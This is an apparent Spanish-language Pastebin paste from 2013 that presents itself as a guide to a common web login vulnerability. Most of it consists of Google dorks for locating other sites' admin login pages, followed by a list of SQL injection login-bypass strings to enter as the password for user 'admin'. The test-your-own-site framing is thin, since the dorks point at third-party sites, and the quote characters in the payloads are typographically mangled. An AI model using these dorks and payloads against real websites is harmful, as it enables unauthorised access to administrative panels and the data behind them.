Advertisement
jjissuss

bypass-mysql-vulnerabilidad

Oct 19th, 2013
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.32 KB | None | 0 0
  1. En esta Ocacion Les traigo este Articulo, Donde mostrare Una de las Vulnerabilidades Mas Comunes que Existen A Nivel Web en los Logueos
  2.  
  3. Esta vulnerabilidad se debe a una mala filtración de lo que conocemos como variables en la programación.
  4.  
  5. A continuación mostraremos unos claros ejemplos y métodos de como probar si nuestra web es vulnerable al mal filtrado.
  6. Mediante los siguientes Dorks, se pueden encontrar los páneles de administración para sites con MySql
  7.  
  8. inurl:admin.asp
  9. inurl:admin/login.asp
  10. inurl:login/admin.asp
  11. inurl:adminlogin.asp
  12. inurl:adminhome.asp
  13. inurl:admin_login.asp
  14. inurl:administratorlogin.asp
  15. inurl:login/administrator.asp
  16. inurl:administrator_login.asp
  17.  
  18. Y mediante las siguientes sintaxis se puede hacer lo que se conoce como bypass, por supuesto en web vulnerables.
  19. User: admin y con los siguientes password:
  20.  
  21. ‘ or 0=0 –
  22. ” or 0=0 –
  23. or 0=0 –
  24. ‘ or 0=0 #
  25. ” or 0=0 #
  26. or 0=0 #
  27. ‘ or ‘x’=’x
  28. ” or “x”=”x
  29. ‘) or (‘x’=’x
  30. ‘ or 1=1–
  31. ” or 1=1–
  32. or 1=1–
  33. ‘ or a=a–
  34. ” or “a”=”a
  35. ‘) or (‘a’=’a
  36. “) or (“a”=”a
  37. hi” or “a”=”a
  38. hi” or 1=1 –
  39. hi’ or 1=1 –
  40. hi’ or ‘a’=’a
  41. hi’) or (‘a’=’a
  42. hi”) or (“a”=”a
  43.  
  44. ‘or’1′=’1
  45. ‘or’1′=’1
  46. ‘ or ’1′=’1
  47. ‘ or ‘x’=’x
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement